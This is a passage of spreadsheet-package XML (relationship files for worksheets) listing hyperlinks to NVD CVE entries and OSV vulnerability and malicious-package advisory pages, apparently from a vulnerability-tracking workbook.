Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93180" TargetMode="External" Id="rId996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93181" TargetMode="External" Id="rId997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93182" TargetMode="External" Id="rId998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93183" TargetMode="External" Id="rId999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93184" TargetMode="External" Id="rId1000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93185" TargetMode="External" Id="rId1001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93186" TargetMode="External" Id="rId1002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93187" TargetMode="External" Id="rId1003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93188" TargetMode="External" Id="rId1004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93189" TargetMode="External" Id="rId1005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93190" TargetMode="External" Id="rId1006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93191" TargetMode="External" Id="rId1007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93192" TargetMode="External" Id="rId1008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93193" TargetMode="External" Id="rId1009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93194" TargetMode="External" Id="rId1010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93195" TargetMode="External" Id="rId1011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93196" TargetMode="External" Id="rId1012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93197" TargetMode="External" Id="rId1013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93198" TargetMode="External" Id="rId1014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93199" TargetMode="External" Id="rId1015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93200" TargetMode="External" Id="rId1016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93201" TargetMode="External" Id="rId1017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93202" TargetMode="External" Id="rId1018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93203" TargetMode="External" Id="rId1019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93204" TargetMode="External" Id="rId1020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93372" TargetMode="External" Id="rId1021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93373" TargetMode="External" Id="rId1022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93374" TargetMode="External" Id="rId1023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93375" TargetMode="External" Id="rId1024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93376" TargetMode="External" Id="rId1025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93377" TargetMode="External" Id="rId1026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93378" TargetMode="External" Id="rId1027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93379" TargetMode="External" Id="rId1028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93380" TargetMode="External" Id="rId1029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93381" TargetMode="External" Id="rId1030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93382" TargetMode="External" Id="rId1031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93383" TargetMode="External" Id="rId1032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93384" TargetMode="External" Id="rId1033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93385" TargetMode="External" Id="rId1034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93386" TargetMode="External" Id="rId1035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93387" TargetMode="External" Id="rId1036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16255" TargetMode="External" Id="rId1037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16248" TargetMode="External" Id="rId1038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-9395-2g46-rj3f" TargetMode="External" Id="rId1039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16258" TargetMode="External" Id="rId1040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16249" TargetMode="External" Id="rId1041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16257" TargetMode="External" Id="rId1042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16272" TargetMode="External" Id="rId1043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16266" TargetMode="External" Id="rId1044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16259" TargetMode="External" Id="rId1045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16265" TargetMode="External" Id="rId1046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16256" TargetMode="External" Id="rId1047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-xjw9-38cr-6372" TargetMode="External" Id="rId1048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16250" TargetMode="External" Id="rId1049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16251" TargetMode="External" Id="rId1050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16252" TargetMode="External" Id="rId1051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16254" TargetMode="External" Id="rId1052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16260" TargetMode="External" Id="rId1053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16261" TargetMode="External" Id="rId1054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16262" TargetMode="External" Id="rId1055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16263" TargetMode="External" Id="rId1056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16264" TargetMode="External" Id="rId1057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16267" TargetMode="External" Id="rId1058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16268" TargetMode="External" Id="rId1059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16269" TargetMode="External" Id="rId1060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16270" TargetMode="External" Id="rId1061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16271" TargetMode="External" Id="rId1062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16273" TargetMode="External" Id="rId1063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16274" TargetMode="External" Id="rId1064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16275" TargetMode="External" Id="rId1065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77411" TargetMode="External" Id="rId1066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77405" TargetMode="External" Id="rId1067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77408" TargetMode="External" Id="rId1068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77403" TargetMode="External" Id="rId1069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77410" TargetMode="External" Id="rId1070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77412" TargetMode="External" Id="rId1071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75516" TargetMode="External" Id="rId1072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77404" TargetMode="External" Id="rId1073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82410" TargetMode="External" Id="rId1074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77406" TargetMode="External" Id="rId1075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59965" TargetMode="External" Id="rId1076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77407" TargetMode="External" Id="rId1077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77360" TargetMode="External" Id="rId1078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81871" TargetMode="External" Id="rId1079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59823" TargetMode="External" Id="rId1080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81870" TargetMode="External" Id="rId1081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62949" TargetMode="External" Id="rId1082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63126" TargetMode="External" Id="rId1083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63225" TargetMode="External" Id="rId1084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63506" TargetMode="External" Id="rId1085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64684" TargetMode="External" Id="rId1086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69147" TargetMode="External" Id="rId1087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75513" TargetMode="External" Id="rId1088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76825" TargetMode="External" Id="rId1089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77401" TargetMode="External" Id="rId1090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81176" TargetMode="External" Id="rId1091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81875" TargetMode="External" Id="rId1092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81876" TargetMode="External" Id="rId1093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82399" TargetMode="External" Id="rId1094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84997" TargetMode="External" Id="rId1095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85731" TargetMode="External" Id="rId1096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85732" TargetMode="External" Id="rId1097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85756" TargetMode="External" Id="rId1098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86003" TargetMode="External" Id="rId1099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86043" TargetMode="External" Id="rId1100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86071" TargetMode="External" Id="rId1101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88976" TargetMode="External" Id="rId1102" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet3.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87886" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54734" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62104" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69399" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69865" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70200" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83944" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85889" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92937" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92940" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92941" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92946" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92947" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92953" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92955" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92956" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92960" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85885" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92938" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92948" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45140" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54460" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54617" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54626" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54627" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62101" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62108" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86707" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86709" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86710" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87796" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90822" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90823" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92944" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54053" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54752" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87701" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92934" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92935" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54501" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54618" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92939" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92951" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92957" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54237" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70009" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86863" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92950" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15688" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79752" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92943" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93393" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54670" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54767" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63472" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76949" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82761" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85500" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86533" TargetMode="External" Id="rId59" /><Relationship 